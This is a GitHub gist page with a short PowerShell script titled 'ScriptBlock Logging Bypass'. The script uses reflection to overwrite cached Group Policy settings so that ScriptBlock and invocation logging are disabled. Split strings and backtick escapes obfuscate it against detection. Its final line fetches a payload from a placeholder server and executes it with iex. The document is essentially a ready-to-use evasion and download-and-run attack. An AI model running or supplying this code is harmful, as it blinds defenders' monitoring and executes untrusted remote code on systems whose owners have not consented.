Skip to content

Instantly share code, notes, and snippets.

@gavz
Forked from cobbr/ScriptBlockLogBypass.ps1
Created June 17, 2024 21:10
Show Gist options
  • Save gavz/efd08090f457f67e0d025401df7a3037 to your computer and use it in GitHub Desktop.
Save gavz/efd08090f457f67e0d025401df7a3037 to your computer and use it in GitHub Desktop.
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
$val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$val.Add('EnableScriptB'+'lockLogging', 0)
$val.Add('EnableScriptB'+'lockInvocationLogging', 0)
$GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val
}
iex (New-Object Net.WebClient).downloadstring("https://myserver/mypayload.ps1")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment